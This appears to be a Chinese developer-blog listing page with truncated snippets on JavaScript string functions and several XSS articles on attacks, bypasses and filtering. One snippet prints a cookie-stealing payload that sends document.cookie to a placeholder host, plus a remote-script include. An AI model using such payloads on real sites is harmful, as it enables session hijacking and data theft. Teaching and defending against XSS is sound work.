首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
C fromCharCode 函数
2024-09-06
String 对象-->fromCharCode() 方法
1.定义和用法 将ASCII码转换成对应的字符 语法: String.fromCharCode(n1, n2, ..., nX) 参数: n1, n2, ..., nX:一个或多个 Unicode 值 注意: 1.对象方法(实例方法):对象名.xxx() 2.类方法(静态方法):引用类型名.xxx() 举例: var str = String.fromCharCode(110,1,88) console.log(str) 输出:
EK中fromCharCode和parseInt的配合使用
基于web的漏洞攻击的第一步一般是:在landing page中通过<script>标签下的JavaScript脚本引入一些恶意链接.这些脚本往往会採用各种各样的混淆.加密手法来躲避AV和browser的拦截.以使得一些恶意脚本源码不轻易暴露.即使这些landing page被拦截,设计静止的混淆手法也能加大安全project师对恶意代码的分析难度. 利用JavaScript内置的parseInt函数和String对象的fromCharCode函数配合使用,来加密恶意脚本是一种常见的手法. 先
IE 浏览器各个版本 JavaScript 支持情况一览表
语言元素 语言元素 突发.IE6 标准.IE7 标准 IE8 标准 IE 9 标准 IE 10 标准 边缘 Windows 应用商店应用程序 __proto__ 属性 (Object) (JavaScript) N N N N Y V8:否 v8.1:是 $1...$9 属性 (RegExp) (JavaScript) Y Y Y Y Y Y 有关属性 Y Y Y Y Y Y abs 函数 Y Y Y Y Y Y acos 函数 Y Y Y Y Y Y ActiveXObject 对象 Y Y
JavaScript 字符串处理详解
一.创建字符串 创建一个字符串,将一组字符串用引号包起来,将其赋值给一个字符串变量. var JsStr="Hello,JavaScript String!"; 二.字符串查找方法 1.字符方法charAt(),charCodeAt(),fromCharCode() (1)charAt()函数 功能:返回字符串中指定位置的字符; 语法:String.charAt(n); 参数:n--字符在字符串中的位置(字符串第一个字符的位置为0); 返回值:返回n位置的字符,如果n不在0
Cross-Site Scripting(XSS)简介
最近才开始研究HTML以及安全问题.如果有什么说得不对的地方,望请指出. 在网络应用安全中,XSS可能是最常见,范围最大,所包含攻击方法最多,同时也是最难以理解的一种攻击.在OWASP所列出的十大网络应用安全风险中,其排名第二位,仅次于SQL Injection. 而在本篇文章中,我们将一步一步深入挖掘XSS的攻击流程,攻击手段,以及防御方法等各个方面. XSS示例 在深入了解XSS的各个方面之前,让我们首先了解XSS攻击到底是怎样完成的. 就以一个博客应用为例.其常常需要允许读者对博主的文章进
javascript string 函数集
JavaScript_String对象说明 string中文为"字符串"的意思,String继承自Object对象,此对象提供字符串的查找操作等函数 JavaScript字符串类型参见JavaScript字符串类型 String的内容是不可变的,下面介绍的String的函数都不能改变其内容(又复制了一份) 引用网址:http://www.dreamdu.com/javascript/object_string/ String对象构造函数 var strobject=new String
xss如何加载远程js的一些tips
在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现. 一个简单的例子 <script src=http://xxx.xxx/a.js></script> 这样更为简洁 <script sr
XSS初探
1 什么是XSS跨站脚本 跨站脚本是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户输入过滤不足而产生的.攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料盗取.会话劫持.钓鱼欺骗等各种攻击. XSS跨站脚本本身对WEB服务器没有直接危害,它借助网站进行传播,使网站的大量用户受到攻击.攻击者一般通过留言.电子邮件或其他途径向受害者发送一个精心构造的恶意URL,当受害者在Web浏览器中打开该
【使用 DOM】使用事件
1. 使用简单事件处理器 可以用几种不同的方式处理事件.最直接的方式是用事件属性创建一个简单事件处理器(simple event handler).元素为它们支持的每一种事件都定义了一个事件属性.举个例子,onmouseover事件属性对应全局事件mouseover,后者会在用户把光标移动到元素占据的浏览器屏幕的上方时触发.(这是一种通用的模式:大多数事件都有一个对应的事件属性,其名称定义为 on<eventname>) 1.1 实现简单的内联事件处理器 使用某个属性最直接的方式是给它指派一组
【温故而知新-Javascript】使用事件
1. 使用简单事件处理器 可以用几种不同的方式处理事件.最直接的方式是用事件属性创建一个简单事件处理器(simple event handler).元素为它们支持的每一种事件都定义了一个事件属性.举个例子,onmouseover事件属性对应全局事件mouseover,后者会在用户把光标移动到元素占据的浏览器屏幕的上方时触发.(这是一种通用的模式:大多数事件都有一个对应的事件属性,其名称定义为 on<eventname>) 1.1 实现简单的内联事件处理器 使用某个属性最直接的方式是给它指派一组
JavaScript 字符串处理详解【转自:http://www.cnblogs.com/mondLei/p/4096855.html】
一.创建字符串 创建一个字符串,将一组字符串用引号包起来,将其赋值给一个字符串变量. var JsStr="Hello,JavaScript String!"; 二.字符串查找方法 1.字符方法charAt(),charCodeAt(),fromCharCode() (1)charAt()函数 功能:返回字符串中指定位置的字符; 语法:String.charAt(n); 参数:n--字符在字符串中的位置(字符串第一个字符的位置为0); 返回值:返回n位置的字符,如果n不在0
Xsser
来源:https://www.cqhacker.cn/post-174.html XSSer使用说明 ================================================================ 简介:===============================================================跨站脚本者是一个自动框架,检测,利用和报告基于Web应用XSS漏洞.它包含几个选项,试图绕过某些过滤器,以及各种特殊的代码注入技术.
用JavaScript 来将数字转换成字符。
背景: 一切嵌入式设备上面的信息,比如设备名称,设备时区是可以写入到设备上面的寄存器中的(一个寄存器两个字节,2*8 bit),比如 -1 ,写入到寄存器中为 2d31,然后可以通过一些进程将寄存器中的数据上传到我们的数据库中来(比如mysql , postgres)需求: 我们现在要在web 网页上将设备的名称,时区解析出来. 方案:1. 将16进制的 2d31 转成10进制数据. parseInt('2d31', 16); //11569 2. 求解出 11569 存到两个字节中是,每个字
【Javascript语言精粹】笔记摘要
现在大部分编译语言中都流行要求强类型.其原理在于强类型允许编译器在编译时检测错误.我们能越早检测和修复错误,付出的代价越小.Javascript是一门弱类型的语言,所以Javascript编译器不能检测出类型错误. NaN是一个数值,它表示一个不能产生正常结果的运算结果.NaN不等于任何值,包括它自己.可以用函数isNaN(number)检测NaN. Infinity表示所有大于1.79769313486231570e+308的值. /运算符可能会产生一个非整数结果,即使两个运算数都是整数. 对
【转载】目前主流过滤XSS的三种技术
目前主流过滤XSS的三种技术 过滤 过滤,顾名思义,就是将提交上来的数据中的敏感词汇直接过滤掉.例如对"<script>"."<a>"."<img>"等标签进行过滤,有的是直接删除这类标签中的内容,有的是过滤掉之类标签中的on事件或是'javascript'等字符串,让他们达不到预期的DOM效果. 编码 像一些常见的字符,如"<".">"等.对这些字符进行转换
[读书笔记]javascript语言精粹'
人比较笨,以前只做项目,案例,然而一些javascript的很多理论不知道该怎么描述,所以最近开启一波读书之旅: 标识符 1.定义 标识符以字母开头,可能后面跟上一个或多个字母.数字或者下划线. 2.用处 标识符被用于语句.变量.参数.属性名.运算符以及标记. 数值 1.数值在内部被表示为64位的浮点数: 2.NaN是一个数值,但是它不与任何值,包括它自己,即 NaN !== NaN 为 true: 3.isNaN可以检查数值是否为NaN: 4.方法: number.toExponential(
Python爬虫入门教程 62-100 30岁了,想找点文献提高自己,还被反爬了,Python搞起,反爬第2篇
学术搜索 学习理论的知识少不了去检索文献,好多文献为你的实操提供了合理的支撑,我所在的大学内网默认是有知网账户的,非常NICE 今天要完成的网站是 http://ac.scmor.com/ Google学术搜索是一个文献检索服务,目前主要是提供维普资讯.万方数据等几个学术文献资源库的检索服务.通过Google学术搜索只能够查找到这些学术资料的"报告.摘要及引用内容... 来源百度百科 我们的目标 获取现在访问的链接地址,当你使用谷歌浏览器的开发者工具抓取的时候,得到的是一个js加密函数 注意看上
XSS 绕过技术
XSS Cross-Site Scripting(XSS)是一类出现在 web 应用程序上的安全弱点,攻击者可以通过 XSS 插入一 些代码,使得访问页面的其他用户都可以看到,XSS 通常是可以被看作漏洞的.它允许攻击者绕过安全机 制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,cookies,或者其 他的东西,XSS 分为三类 XSS 分类: 非持久性,持久性和基于 Dom(此类可以是持久的,也可以是不持久的) 非持久性:非持久性 XSS 也被称为反射性
xss小结-从xss平台搭建到csp规则
0x00前言 xss是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的作用,测试的时候我们是用alert(1)弹窗,而做CTF也好,实际中的漏洞利用也好一般是用xss获取管理员的cookie 0x01xss平台搭建 网上有xss的在线平台,但是别人的总没有自己的用着舒服,于是可以试着手动搭建下属于自己的xss平台 首先要拥有自己的vps,能有公网的ip,才能把目标的信息发送过来 这里搭建推荐用蓝莲花战队的github一个项目:https://github.com/firesunCN/Blu
读《javascript语法精粹》知识点总结
昨天泡了大半天的读书馆,一口气看完了<javascript语法精粹>这本书,总体来说这本书还是写的不错,难怪那么多的推荐.<javascript语法精粹>主要是归纳与总结了javascript中的重点知识,下面我把我看玩后觉得比较重要的知识点分享出来. <javascript语言精粹>重要知识点 一.比较有意思的递归函数 1.一个有意思的递归,形成数据结构,0,1,1,2,3,5,8,13……(其实在我的<javascript常用知识点集>中也写过这个递归,
XSS绕过学习
目录 1绕过单引号 2绕过 SCRIPT 过滤 3使用 IMG 源 4使用制表符 换行符和回车符 5使用空白符 6双引号配对的 bug 7绕过css过滤器 8不全面的过滤器 9转义字符 10编码 1,绕过单引号 我们假设管理员在我们的单引号之前放置了一个“\”,有时候双引号之前也会放置,通过一些类似 add_slashes 的函数可以实现,这个就是转义字符,我们先前的代码就会变成这样:<INPUT type="text" value='\'><SCRIPT>
热门专题
360随身WiFi驱动下载
Ubuntu 子系统 安装 桌面
activity 中设置背景颜色为黑色
iOS开发 spaceship使用详解
springboot 2.2.2 集成redis集群
js数字相减精度问题
字符串能当成json返回吗
QT获取控件的rect矩形区域坐标
dotnet6 webapi 过滤器
爬虫程序下载文件 解析
vivado仿真实验心得
python 子包引用父包中的模块
分组标签是语义化标签吗为什么
iview form绑定了formvalue
mysql期末总结感想1000字
java开发pom文件打包配置
XShell的ESC不能结束命令
listview控件 布局是button
python 类的成员名前面有一个下划线
自学python的心得体会和建议